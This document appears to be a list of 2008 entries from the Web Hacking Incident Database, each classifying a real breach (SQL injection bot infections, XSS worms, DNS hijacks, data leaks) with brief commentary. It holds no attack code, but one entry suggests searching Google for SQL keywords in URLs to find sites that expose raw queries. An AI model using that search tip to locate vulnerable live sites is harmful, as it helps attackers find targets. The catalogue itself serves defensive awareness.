In a related but yet unconfirmed story Holly claims to have used the MySpace administrative account for an advertising scam by which he gained $50,000.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-59: Spotify Streaming Music Service Hacked and Millions of Records Leaked
WHID ID: 2008-59
Date Occured: 12/19/2008
Attack Method: Stolen Credentials
Application Weakness: Insufficient Transport Layer Protection
Outcome: Leakage of Information
Attacked Entity Field: Media
Attacked Entity Geography: Sweden
Incident Description:

This time we may need to remove the word "web" leaving this incident classified only as "application security". Spotify is a new music streaming radio like service from Sweden. A weakness in Spotify streaming protocols enables hackers to gain access to users' encrypted passwords, email address, birth date, gender, postal code and billing receipt.

An interesting aspect of this incident is that while the vulnerability has been discovered and fix on December 19th, the fact that it was actually exploited was discovered only in March 2009. Many times companies report that a vulnerability was found on there site, but they are not aware of any exploit of the vulnerability. As this incident shows, even if the company is not aware, there is a chance that the vulnerability was exploited.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-58: New Orkut Worm in Brazil
WHID ID: 2008-58
Date Occured: 10/4/2008
Attack Method: Worm
Application Weakness: Improper Output Handling
Outcome: Planting of Malware
Attacked Entity Field: Web 2.0
Attacked Entity Geography:
Incident Description:

XSSed reports another XSS worm in Orkut. Since Orkut is big in Brazil, it is quite natural that a Brazilian group created the worm.

I have used this occasion to sort out worms reporting in WHID.

  • A worm is now considered an Attack_Method rather than an outcome. If nothing else, the outcome of a worm is "planting of malware": itself.
  • I have added a "Web 2.0" organization type as many of the XSS worms infect Web 2.0 sites.

Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography: Brazil
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-57: Craigslist's Battle Against Spammers
WHID ID: 2008-57
Date Occured: 5/22/2008
Attack Method: Brute Force
Application Weakness: Insufficient Anti-automation
Outcome: Link Spam
Attacked Entity Field: Information Services
Attacked Entity Geography:
Incident Description:

Insufficient Anti-Automation is fat becoming the #1 threat to web sites. Since Captcha has been proved practically useless, especially when there is a financial gain from automating access to the site, sites are pretty much defenceless against harmful automation. Techdirt's story about Craigslist losing the battle against automation tool is a very good example of this serious problem.

Read the comments, they are enlightening. As usual, one of the problem when spam is involved is defining if and what is a wrong doing and what is a valid action. Some commenters say that Craigslist has become useless due to the spam, while others say that Craiglist is the worst censors on the Internet not letting small time businesses work. Other argue about whether this is a crime or not. 132 comments, and they keep coming 8 months after the article has been published.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-56: Soulja Boy Myspace Hacked
WHID ID: 2008-56
Date Occured: 9/1/2008
Attack Method: Unknown
Application Weakness: Insufficient Authentication
Outcome: Extortion
Attacked Entity Field: Entertainment
Attacked Entity Geography:
Incident Description:

This is a first time a hacking report is a video flick. If, like me, you find it hard to understand, you can read a written summary on this Kiwi site. I guess that their readers also needed a translation of the speech in the video to English.

In a nutshell, hackers defaced Soulja Boy's MySpace page and published his e-mail and YouTube passwords on the net. They demanded $2,500 to give him his web presence back. For an artist that grew our of the Internet this presence is naturally very important, however he is now important enough that his record label was able to contact the different sites to get him his web properties back without paying the money.

In this case I have decided to categorize the attacked entity as Soulja Boy and not MySpace or YouTube, as I used to do in the past. The fact that the attack was against Soulja Boy properties around the web makes him, rather than any technology platform, the attack target.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-55: Hackers hijack bitchy fashion blog
WHID ID: 2008-55
Date Occured: 4/23/2008
Attack Method: Unknown
Application Weakness: Insufficient Authentication
Outcome: Defacement
Attacked Entity Field: Media
Attacked Entity Geography: USA
Incident Description:

It might have been a random hack, but the pornographic pictures splashed on an insider fashion industry blog where quickly blamed on the fashion icons and magazines offended by the blog.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-54: Hacker Redirects Obama's site to Hillary Clinton's
WHID ID: 2008-54
Date Occured: 4/18/2008
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field: Government
Attacked Entity Geography: USA
Incident Description:

Netcraft reports that a hacker managed to redirect traffic from Barak Obama's web site to Hillary Clinton's site during the primaries held between the two.The culprit, an XSS bug in the Obama's site community blogs section, highlights the danger of user contributed content to web sites.

An interesting side story is that Oliver Friedrichs from Symantec was quoted in a Computer World article only a week earlier saying that presidential campaign web sites are "clueless" about security. Was this a prophecy of or the trigger for the hack?

Additional technical information can be found on XSSed.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-53: 'SQL by Design' leaks Thousands of SSNs at an Oklahoma Gov site
WHID ID: 2008-53
Date Occured: 4/14/2008
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Government
Attacked Entity Geography: USA
Incident Description:

Alex Papadimoulis hits again with a report on leakage of information on Oklahoma's Department of Corrections web site. The detailed report is very interesting and highlights one of the worse types of SQL injection out there: remote SQL by design.

A unique form of SQL injection, or even just a close sibling, remote SQL by design is a vulnerability in which the web application accepts SQL statements from the client in the normal course of operation. The SQL statement might be used in a hidden field, or generated on the fly by a client side script. In any case, it is extremely difficult to prevent alteration of the SQL statement by a user in such applications, making the applications highly vulnerable.

To find for yourself how common is this vulnerability, just Google for SELECT, FROM and WHERE in the URL. Amazing.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-52: The Hannaford Breach
WHID ID: 2008-52
Date Occured: 3/17/2008
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Monetary Loss
Attacked Entity Field: Retail
Attacked Entity Geography: USA
Incident Description:

While the Hannaford Breach which resulted in 4.2 stolen credit cards and 1800 known fraud cases may not be a web hack, a Computer World article mentioned that the company's web site was off line following the breach. Even if the breach itself was not a result of web site issues, such issues where probably found in the security review to follow the Breach making the incident a worthy addition to WHID.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link: http://www.computerworld.com/action/article.do?command=viewArticleBasic&taxonomyName=Disaster+Recovery&articleId=9068999&taxonomyId=151&pageNumber=1
Entry Title: WHID 2008-51: TrendMicro web site hit
WHID ID: 2008-51
Date Occured: 3/15/2008
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Technology
Attacked Entity Geography: Japan
Incident Description:

The infamous SQL injection bot has hit TrendMicro, worrying considering the fact that TrendMicro is there to protect us from malware. Unfortunately it seems that web security is still underrated outside of a small group of experts, even though it fast becomes the modern day equivalent of the now declining viruses and worms.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-50: The Indian government acknowledges hacking incidents
WHID ID: 2008-50
Date Occured: 2/29/2008
Attack Method: Various
Application Weakness: Application Misconfiguration
Outcome: Leakage of Information
Attacked Entity Field: Government
Attacked Entity Geography: India
Incident Description:

An official Indian government response to a question in the Indian parliament, the Minister of State for Communications and Information Technology discusses hacking incidents which occurred between 2005 and 2008 in a large number of Indian government agencies. The interesting information is the list of agencies affected:

  • Ministry of Railways,
  • Air Cargo Customs (Mumbai),
  • Forward markets Commission,
  • National Institute of Health and Family Welfare,
  • National Institute of Social Defence,
  • Department of Administrative Reforms and Public Grievances,
  • Wireless Planning & Coordination Wing,
  • Bharat Sanchar Nigam Limited,
  • Telecom Regulatory Authority of India,
  • Department of Information Technology and
  • Anthropological Survey of India.

Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-49: ValueClick weak decryption and vulnerability to SQL injection
WHID ID: 2008-49
Date Occured: 3/17/2008
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Monetary Loss
Attacked Entity Field: Marketing
Attacked Entity Geography: USA
Incident Description:

As a side story to ValueClick indictment of deceptive marketing by the FTC, the FTC investigation also found SQL injection vulnerabilities and lack of sufficient encryption of sensitive customer information. These findings contributed to the $2.9 million fine the FTC levied on ValueClick as well as to the company being dumped from managing eBay's affiliate program.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-48: TicketMaster Fighting Hackers Line Bypassing
WHID ID: 2008-48
Date Occured: 3/9/2008
Attack Method: Brute Force
Application Weakness: Insufficient Anti-automation
Outcome: Extortion
Attacked Entity Field: Retail
Attacked Entity Geography: USA
Incident Description:

Update (April 19th 2009) - A recent article in the Vancouver Sun further discuss the issue. While there are no new technical details, the discussion that follows the article is illuminating


Insufficient anti-automation is fast becoming a major, if not the major threat to web application. The reason is that it can be very profitable for the hacker, and on the other hand it is far from a simple vulnerability just requiring a quick fix.

TicketMaster on going combat with hackers line bypassing to buy event tickets to resell them for a high price is a very good example of the issue. In this specific example the hackers demonstrate that Captcha, a method of blocking automated programs by presenting a challenge supposedly difficult for a computer software, is not sufficient.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-47: The Federal Suppliers Guide validates login credential in JavaScript
WHID ID: 2008-47
Date Occured: 2/29/2008
Attack Method: Stolen Credentials
Application Weakness: Insufficient Authentication
Outcome: Monetary Loss
Attacked Entity Field: Marketing
Attacked Entity Geography: USA
Incident Description:

Alex Papadimoulis tells in a brilliantly humoristic way about the lack of security of the Federal Suppliers Guide's web site. The guide, is presumably limited to federal procurement agents only, but at the time of writing the credential checking was done on the client in JavaScript and for a single global user name and password.

Beyond making a mockery of the claim that the guide was limited to federal agents only, it also seemed to be a marketing method as it limits the potential advertisers from checking who is in the guide. After getting in Alex contacted some of the advertisers to find out that none of them got any value from the guide. Alex did not join, and I wonder how much Alex's report lowered the Federal Suppliers Guide earning.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography: USA
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-46: CheckFree customers redirected to fraudsters sites
WHID ID: 2008-46
Date Occured: 12/2/2008
Attack Method: DNS Hijacking
Application Weakness: Insufficient Authentication
Outcome: Phishing
Attacked Entity Field: Finance
Attacked Entity Geography: USA
Incident Description:

In an attack with an alarming similarity to the COX incident (WHID 2008-45), but with a far greater potential damage, hackers changes the DNS records for CheckFree, the largest bill payment service in the USA. Customers where redirected to servers in the Ukraine, which attempted to install a password login software on their computers.

The change was done using correct credentials to login to the administrative web site of Network Solutions, CheckFree domain registrar. It is yet unknown how the hackers got the credentials. Since Phishing attacks against domain registrars including Network Solutions have started to surface recently, a good guess is that it was through a Phishing attack.

According to CheckFree report to the authorities, it estimates that around 160,000 customers where expoesed to the attack, and informed 5 million potential victims who may have been among this group.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography: Ukraine
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-45: Comcast domain hijacked
WHID ID: 2008-45
Date Occured: 1/5/2009
Attack Method: Domain Hijacking
Application Weakness: Application Misconfiguration
Outcome: Defacement
Attacked Entity Field: Internet
Attacked Entity Geography: USA
Incident Description:

Recently the domain names has been the focus on hacking activity. Hackers found that hijacking a domain is as effective if not more than attacking the web site itself.

Are domain hacking a case of web hacking? should they be included in WHID? in this case it seems, according to the Wired report that the hack itself involved attacking the domains registrar's (Network Solutions) web interface.

However, we believe that the resulting "virtual" defacement of the web site by redirecting users to a fraudulent web site is still a web hack, even if the DNS hijacking is not web related.

The defaced site, as logged by the register was:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-44: Balkan cyber wars
WHID ID: 2008-44
Date Occured: 4/1/2008
Attack Method: Brute Force
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Various
Attacked Entity Geography:
Incident Description:

The interesting report in ZDnet about the cyber war around Kosovo is unique in describing the process. According to the report hacker groups on each side share information in order to make attacks more efficient. Some collect vulnerable web sites, while others use automatic defacement tools to attack.

On the positive side, the report states that at the time of writing, there is a ceasefire and parties are negotiating. Is there room for cyber peace along side cyber war?


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-43: Russian nuclear power web sites attacked amid accident rumors
WHID ID: 2008-43
Date Occured: 1/5/2009
Attack Method: Unknown
Application Weakness:
Outcome:
Attacked Entity Field: Government
Attacked Entity Geography: Russia
Incident Description:

Novosti, the Russian news agency reports that in what seems to be a planned dual head attack to break panic by spreading a rumor about a nuclear accident near St. Petersburg.

At the same time that e-mails spreading the rumor where distributed, hackers blocked access to web sites enabling the public to check for themselves the status of the nuclear power pland intensifying the panic.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-42: Chinese hackers steal 9 million items of personal information from South Koreans
WHID ID: 2008-42
Date Occured: 12/30/2008
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Various
Attacked Entity Geography: South Korea
Incident Description:

The Dark Visitor, a Chinese hacking insider site, and the Korean Chuson reports that a Chinese hacker used a commercially available SQL injection tool called HDMI to penetrate a large number of South Korean sites and still 9 million personal information items, which he than sold for approximately $15,000 to South Koreans for them to abuse.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography: China
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-41: A Joomla first day exploit
WHID ID: 2008-41
Date Occured: 8/12/2008
Attack Method: Credential/Session Prediction
Application Weakness: Insufficient Authorization
Outcome: Defacement
Attacked Entity Field: Various
Attacked Entity Geography:
Incident Description:

Joomla is a widely used open source content management system. Many administrators reports that a vulnerability announced August 12th was immediately exploited by hackers to attack Joomla based web sites. Another report shows a specific site that was defaced by exploiting the same vulnerability.

This incident shows the importance of timely patching, but also brings back the age old debate around publication of vulnerabilities by researchers. Does it contribute to software security or just helps the hackers?


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology: Joomla
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-40: Olympics news sites hit with attacks
WHID ID: 2008-40
Date Occured: 8/12/2008
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Planting of Malware
Attacked Entity Field: Information Services
Attacked Entity Geography: India
Incident Description:

Like many Asprox bot SQL injection attacks, the one on NDTV.com, a New Delhi TV station's web site has its unique aspects.

First, the attack came at absolutely the wrong time, just when all eyes (and mouse clicks) where turned to the Olympic games in Beijing, the NDTV web site which carried real time information from the games was hacked, greatly extending the infection rate.

In addition, the information was syndicated from a French news agency. While apparently the agency did not have anything to do with the hack, the did catch some fire over the incident as some experts suggested it should help its customers to protect their systems.

More information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-39: Hacker compromises a south african political party web site
WHID ID: 2008-39
Date Occured: 8/7/2008
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Planting of Malware
Attacked Entity Field: Government
Attacked Entity Geography: South Africa
Incident Description:

The South African Democratic Alliance party's web site seems like another random victim of the Asprox family of bots. This specific incident demonstrates several issues:

  • Aprox successfully attacks organizations that should really know better.
  • While most known cases of Asprox attacks result in planting of malware on the web site, since this is easily detected by malware search services, the very brutal injection used by Asprox probably takes down more sites than it infects with malware.
  • According to one comment, the site used an outdated version of WordPress, stressing again the problem with not upgrading in a timely manner, especially open source software.

More information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography: Russia
Attacked System Technology: WordPress
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-38: DNSChanger Trojans v4.0
WHID ID: 2008-38
Date Occured: 12/4/2008
Attack Method: Cross Site Request Forgery (CSRF)
Application Weakness: Insufficient Process Validation
Outcome: Fraud
Attacked Entity Field: Various
Attacked Entity Geography:
Incident Description:

The DNSchanger Trojan uses different methods to manipulate the DNS lookup of the victim. One of the most malicious techniques is using CSRF to attack the ADSL or cable router and modify its DNS tables.

More Information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-37: Pakistani hacker attacks Indian Rail site, threatens cyber war on India
WHID ID: 2008-37
Date Occured: 12/24/2008
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Planting of Malware
Attacked Entity Field: Government
Attacked Entity Geography: India
Incident Description:

The web site of the Indian Eastern Railway company was hacked. The hacker planted malware on the site and added a message to the home page declaring a cyber war on Indian Cyberspace.

Additional Information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography: Pakistan
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-36: RBS WorldPay Data Breach Hits 1.5 Million (Updated)
WHID ID: 2008-36
Date Occured: 11/10/2008
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Finance
Attacked Entity Geography: USA
Incident Description:

Update (Feb 4th 2009): While RBS reported that just 100 cards where abused in the incident, the news now surfaced, that those cards where heavily abused as the hacker managed to lift the withdrawal limit and distribute the card copies around the world so that in total 9 million dollars where withdrawn from them in a matter of hours before they where blocked. At least, as the saying goes, losing a $100 is your problem; losing a million is the banks.


The Royal Bank of Scotland (RBS) confirmed that a hacker perform a "sophisticated cyber intrusion" on RBS WorldPay Unit web site. 1.5 Million credit card numbers and 1.1 million social security numbers may have been stolen.

At this time the only abuse known is a fraudulent use of about a 100 reloadable cards, which are used by companies to pay their employees.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-35: Business Week site hit by malware
WHID ID: 2008-35
Date Occured: 9/15/2008
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Planting of Malware
Attacked Entity Field: Information Services
Attacked Entity Geography: USA
Incident Description:

Business Week is the latest victim of Asprox, a botnet using SQL injection attacks to plant malware. Internet News reports that Sophos has discovered malwares on a large number of pages on the magazine’s web site. A Google safe browsing report, which checks how many pages on a web site, if any, are infected with malware picked at 214 out of 2,157 pages on the site, just shy of 10%.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-34: Adobe hit by malware
WHID ID: 2008-34
Date Occured: 10/17/2008
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Planting of Malware
Attacked Entity Field: Technology
Attacked Entity Geography: USA
Incident Description:

Adobe joins the long list of sites hit by Asprox, a botnet using SQL injection attacks to plant malware. Internet News reports that Sophos has discovered malwares on Adobe “Vlog it” and “Serious Magic” sites.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-33: Chinese hacker jailed for false quake alarm
WHID ID: 2008-33
Date Occured: 5/29/2008
Attack Method: Unknown
Application Weakness: Insufficient Authorization
Outcome: Disinformation
Attacked Entity Field: Government
Attacked Entity Geography: China
Incident Description:

A Chinese student penetrated the Shaanxi Provincial Seismic Bureau's web site and planted a false warning on an earth quake expected the following night reports The Australian.
The false warning created panic, especially since it was made shortly after the devastating earth quake hitting China just a few weeks earlier. The faked warning drew 767 page views within 10 minutes, the bureau’s phones became immediately very busy.
As expected in China, authorities were far from forgiving, and the student was jailed for 18 months.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography: China
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-32: Yahoo HotJobs XSS
WHID ID: 2008-32
Date Occured: 10/26/2008
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Session Hijacking
Attacked Entity Field: Internet
Attacked Entity Geography: USA
Incident Description:

Netcraft reported an ongoing exploit of XSS vulnerability in Yahoo HotJobs site. The attackers have been using an obfuscated JavaScript to steal session cookies of victims, which were in turn sent to a server in the US.
The stolen cookie was a yahoo-wide cookie and therefore by stealing it the hackers could gain control of every service accessible to the victim within Yahoo, including Yahoo! Mail.
Netcraft identified the issue by observing irregular activity by its toolbar users and Yahoo! fixed the vulnerability short after, on Oct 28th.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://news.netcraft.com/archives/2008/10/26/ongoing_phishing_attack_exposes_yahoo_accounts.html
Attack Source Geography: USA
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-31: Hacker takes $50,000 a few cents at a time
WHID ID: 2008-31
Date Occured: 9/20/2008
Attack Method: Process Automation
Application Weakness: Insufficient Anti-automation
Outcome: Monetary Loss
Attacked Entity Field: Internet
Attacked Entity Geography: USA
Incident Description:

Californian Michael Largent used an automated script to open 58,000 such accounts, collecting many thousands of the small payments used to verify credit cards when openning accounts.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-30: Security breach hits DivShare, unauthorized access to its database
WHID ID: 2008-30
Date Occured: 9/20/2008
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Information Services
Attacked Entity Geography:
Incident Description:

The popular document and media sharing service DivShare, suffered a security breach that allowed a malicious user to access their database, which included user e-mail addresses and other basic profile information.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-29: Sunwear hacks metasploit.com?
WHID ID: 2008-29
Date Occured: 9/20/2008
Attack Method: ARP spoofing
Application Weakness: Insufficient Transport Layer Protection
Outcome: Defacement
Attacked Entity Field: Internet
Attacked Entity Geography:
Incident Description:

someone hacked a machine on the same subnet and was ARP spoofing the gateway. The metasploit.com machines were not compromised, but all HTTP requests coming into the ISP network were passed through a MITM defacer that inserted that HTML. Once I as able to set a static ARP entry and notify the ISP, the problem was resolved. So, to make things clear, the metasploit.com servers were not hacked, the ISP


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-28: Confidential data on thousands of students exposed by test preparatory firm
WHID ID: 2008-28
Date Occured: 9/20/2008
Attack Method: Misconfiguration
Application Weakness: Insufficient Authentication
Outcome: Leakage of Information
Attacked Entity Field: Education
Attacked Entity Geography: New York, NY
Incident Description: While moving to a new hosting provider, a system by Princeton Review used by student to prepare for a state assessment program exposed due to misconfiguration approximately 34,000 students from 2nd to 10th grade. The information included names, Florida ID (which is nearly identical to the US social security number) and the students exam report. The information was available for available online from late June to early August.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.nytimes.com/2008/08/19/technology/19review.html?_r=3&adxnnl=1&oref=slogin&adxnnlx=1221859844-4bHK03P+zrmLhJ5Ul2SlPA
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-27: U.K's Crime Reduction Portal Hosting Phishing Pages
WHID ID: 2008-27
Date Occured: 9/20/2008
Attack Method: Unknown
Application Weakness: Application Misconfiguration
Outcome: Phishing
Attacked Entity Field: Government
Attacked Entity Geography: UK
Incident Description:

Poste Italiane seems to have relocated to a brand new location online, in this case the U.K's Crime Reduction Portal which is currently hosting a phishing page.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-26: Palin's private e-mail hacked, posted to Net
WHID ID: 2008-26
Date Occured: 9/20/2008
Attack Method: Brute Force
Application Weakness: Insufficient Password Recovery
Outcome: Leakage of Information
Attacked Entity Field: Politics
Attacked Entity Geography: USA
Incident Description:

The activist group called "anonymous," best known for its jousts with the Church of Scientology, has apparently hacked into the private Yahoo e-mail account of Alaska Gov. Sarah Palin, the Republican candidate for vice president.

Contents of that account, including two sample e-mails, an index of messages and Palin family photos, have been posted by the whistle blower site Wikileaks, which contends that they constitute evidence that Palin has improperly used her private e-mail to shield government business from public scrutiny, an issue that had already been raised by others.

Update (Oct 8)

David Kernell, the 20-year-old Tennessee college student was indicted with the hack. The most interesting aspect of the identity of the hacker is that his father Mike Kernell is a longtime Democratic state representative from Memphis

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-25: BusinessWeek website attacked and hosts malware
WHID ID: 2008-25
Date Occured: 9/20/2008
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Planting of Malware
Attacked Entity Field: Information Services
Attacked Entity Geography: USA
Incident Description:

Another site hit by the SQL injection bot

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-24: SQL attacks lob onto ATP Web site
WHID ID: 2008-24
Date Occured: 7/21/2008
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Planting of Malware
Attacked Entity Field: Sports
Attacked Entity Geography: Global
Incident Description:

Not a day goes by without yet another prominenent web site hacked by an SQL injection attack planting Malware.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-23: Sony PlayStation
WHID ID: 2008-23
Date Occured: 7/21/2008
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Planting of Malware
Attacked Entity Field: Retail
Attacked Entity Geography: USA
Incident Description:

Yet another iframe injection in a very prominent web site, proving yet again that nobody is immune.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-22: Hacker changes news releases on sheriff's Web site
WHID ID: 2008-22
Date Occured: 7/21/2008
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field: Security & Law Enforcement
Attacked Entity Geography: USA
Incident Description:

A targeted defacement that modified two specific press releases to ridicule the local government.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-21: Information about organ and tissue donors open to all
WHID ID: 2008-21
Date Occured: 7/20/2008
Attack Method: Unintentional Information Disclosure
Application Weakness: Insufficient Authentication
Outcome: Leakage of Information
Attacked Entity Field: Government
Attacked Entity Geography: USA
Incident Description:

The Agency for Health Care Administration (AHCA) Florida's database of organ and tissue donor registry was open to the public due to an unspecified software glitch. Personal details of 55,000 people, including name, address, date of birth, driver license number and social security number where exposed.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-20: XSS Worm At Justin.tv Affects 2525 Profiles
WHID ID: 2008-20
Date Occured: 7/16/2008
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Worm
Attacked Entity Field: Web 2.0
Attacked Entity Geography:
Incident Description:

A proof of concept XSS worm crawled justin.tv, a popular lifecasting platform. The warm succeeded in planting a self replicating code on 2525 accounts in less than 24 hours before the vulnerability was fixed.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
